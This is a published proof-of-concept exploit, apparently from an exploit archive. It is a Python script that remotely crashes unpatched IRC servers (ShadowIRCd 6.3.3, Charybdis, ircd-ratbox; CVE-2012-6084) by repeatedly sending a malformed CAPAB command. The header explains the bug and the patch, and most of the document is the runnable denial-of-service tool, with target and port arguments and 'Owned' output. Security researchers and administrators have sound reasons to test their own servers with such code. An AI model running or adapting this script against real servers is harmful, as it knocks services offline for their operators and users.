This exploit demonstrates a remotely trigger-able crash in ircd-ratbox version 2.0. It affects Shadowircd version 6.3.3 and Charybdis version 3.4.2.
505feddc38f244f05e0a7faef634f09df484c9f17abd9e04dfc0e53aceb6f6ad
#!/usr/bin/python3
###################################################################################
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \ https://www.zempirians.com
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
# Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
# -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
# [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
# +VULNERABLE+
# ../shadowircd/modules/m_capab.c - LINE(40)
# {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
#
# The bug has to do with server capability negotiation. A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
#
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue. All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# https://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################
from argparse import ArgumentParser
import socket
def own( uri, port ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()
print( "\t[+] Connected, Sending Payload To {}:{}".format( uri, port ) )
while True:
try:
sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
except socket.error as se:
print( '\t[!] Owned <3' )
break
sock.close()
if __name__ == '__main__':
parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )
parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )
args = parser.parse_args()
own( args.target, args.port )